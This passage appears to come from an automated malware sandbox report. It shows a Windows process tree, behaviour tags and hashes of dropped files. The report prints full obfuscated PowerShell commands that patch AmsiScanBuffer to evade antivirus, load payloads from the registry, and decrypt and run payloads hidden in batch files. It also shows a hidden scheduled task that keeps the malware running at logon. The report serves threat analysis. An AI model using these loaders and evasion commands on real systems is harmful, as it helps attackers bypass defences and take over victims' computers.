$gojqNXesvSC.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$SWfBrdFftBjXnB).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+'e'+'d');$gojqNXesvSC.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c'+[Char](44)+''+'H'+''+'i'+''+[Char](100)+'e'+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+'l'+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'ua'+[Char](108)+'',$HDxZuSWSNF,$SWfBrdFftBjXnB).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $gojqNXesvSC.CreateType();}$vkvCZHHNldBSW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'st'+[Char](101)+'m'+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+'so'+'f'+''+'t'+''+[Char](46)+'W'+'i'+''+[Char](110)+''+'3'+'2'+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+'ti'+[Char](118)+'e'+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$eicFWavBgYDyVy=$vkvCZHHNldBSW.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'dd'+[Char](114)+'e'+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+'c'+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HhzVhZYvvqaentQOTXD=BRxQuWYiLWrB @([String])([IntPtr]);$OFIGDowNyRUpxFevcxYaDX=BRxQuWYiLWrB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XsWJOWyPhwn=$vkvCZHHNldBSW.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+'n'+[Char](101)+''+'l'+''+'3'+''+'2'+'.'+[Char](100)+''+'l'+''+'l'+'')));$oRciIxApkLoMkg=$eicFWavBgYDyVy.Invoke($Null,@([Object]$XsWJOWyPhwn,[Object](''+[Char](76)+'o'+[Char](97)+'d'+[Char](76)+'ib'+[Char](114)+''+'a'+''+'r'+''+[Char](121)+''+[Char](65)+'')));$UOdKqIOOpCBFREQAS=$eicFWavBgYDyVy.Invoke($Null,@([Object]$XsWJOWyPhwn,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+'t'+'e'+''+[Char](99)+'t')));$qdgWXSP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oRciIxApkLoMkg,$HhzVhZYvvqaentQOTXD).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$hqPocxpbJugmIbQeH=$eicFWavBgYDyVy.Invoke($Null,@([Object]$qdgWXSP,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+'S'+'c'+'a'+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+'f'+'e'+'r'+'')));$WMlxTGLVfp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UOdKqIOOpCBFREQAS,$OFIGDowNyRUpxFevcxYaDX).Invoke($hqPocxpbJugmIbQeH,[uint32]8,4,[ref]$WMlxTGLVfp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hqPocxpbJugmIbQeH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UOdKqIOOpCBFREQAS,$OFIGDowNyRUpxFevcxYaDX).Invoke($hqPocxpbJugmIbQeH,[uint32]8,0x20,[ref]$WMlxTGLVfp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+[Char](87)+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HgnFErwFFhil{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yYWhDkkCtRCMcC,[Parameter(Position=1)][Type]$UQOEMVEHTp)$XLIeLKpYpEb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+'e'+''+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+'e'+''+'d'+''+','+''+[Char](65)+'n'+'s'+''+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$XLIeLKpYpEb.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+[Char](100)+'e'+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yYWhDkkCtRCMcC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$XLIeLKpYpEb.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Ne'+'w'+''+'S'+'l'+[Char](111)+''+[Char](116)+','+'V'+''+'i'+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$UQOEMVEHTp,$yYWhDkkCtRCMcC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+',M'+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $XLIeLKpYpEb.CreateType();}$AGGTQvjjLnMPU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+'t'+''+'e'+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+'n'+''+'3'+'2'+'.'+'U'+'n'+''+'s'+''+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+'o'+'ds');$spJEKgtzJPidNa=$AGGTQvjjLnMPU.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SliARoBtjlGitEJAMvo=HgnFErwFFhil @([String])([IntPtr]);$RgKgvWZDvRQXYndAcYwjhs=HgnFErwFFhil @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$klDwLENDFQQ=$AGGTQvjjLnMPU.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+[Char](111)+''+'d'+'u'+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$uywIcpCeIkupxM=$spJEKgtzJPidNa.Invoke($Null,@([Object]$klDwLENDFQQ,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+'r'+[Char](121)+''+'A'+'')));$AeGyMehNyVvHTKlzq=$spJEKgtzJPidNa.Invoke($Null,@([Object]$klDwLENDFQQ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$VSFUAbJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uywIcpCeIkupxM,$SliARoBtjlGitEJAMvo).Invoke('a'+[Char](109)+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+'l'+'');$pkLWfxrQsCSAefuEI=$spJEKgtzJPidNa.Invoke($Null,@([Object]$VSFUAbJ,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$WfBiezGkKS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AeGyMehNyVvHTKlzq,$RgKgvWZDvRQXYndAcYwjhs).Invoke($pkLWfxrQsCSAefuEI,[uint32]8,4,[ref]$WfBiezGkKS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pkLWfxrQsCSAefuEI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AeGyMehNyVvHTKlzq,$RgKgvWZDvRQXYndAcYwjhs).Invoke($pkLWfxrQsCSAefuEI,[uint32]8,0x20,[ref]$WfBiezGkKS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Fix.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Fix.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_510_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_510.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_510.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_510.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_510.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_510.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ICxj3Vtd5xCN.bat" "7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5abb32a21b372771497e60587093e30de
SHA18e367f71fcad479ce3f314764ba9af0d4fcaa37c
SHA2564afb16987a8b970f3eca85c5112670d52d748cdabdc4caf31e0ccac1428c8eb9
SHA512e97f418d46ab2ddb5d855307127db9963b206898e70cd99dc0eee433ef643e7e5fb90c9b07ed4eec92caa1766104fa22fc5579301e656dd6e2a7690adcd11ce7
-
C:\Users\Admin\AppData\Local\Temp\ICxj3Vtd5xCN.batFilesize
276B
MD54c2c99b9568ae2d6fb3ca0aac1f7f4cb
SHA1f377d583e9539f7332a5d8186c5cdc70f9d4483d
SHA2567b91f7afb2f3d4f50c7ebeebd29c62eadc317dd0cc893dd01fa28b8f6ede6303
SHA51278f69e1cf0eedbf197697ca1226517af4a47666a0b89a001c417fd39a892f287900121856a391ee51d7fe14543a0203c1da81dfc2afeb7d7731a29fe76062350
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pwnczw34.fzm.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-14-~1Filesize
224B
MD5f6b4516e4a7f88c6bc64f3baf76f1e55
SHA1cb22d6b5a29ae586ecde615b15dee15adedd0f25
SHA2563f5b249c118cfb6b076126831c592770fb8707a0f1051641fffb276ab931a369
SHA5121833bbc5160e73115db38a03097518366d3c4fe5e0fbe29ad870f24ed6c4f029099b139d16d39a606beb7b7d0289441b609c54d96d7fe420c04c26a32c33afa5
-
C:\Users\Admin\AppData\Roaming\startup_str_510.batFilesize
513KB
MD5a84be587721ab2558489178539f283e6
SHA15a48f5c98f7366d13f371965c19c98a5754bd90b
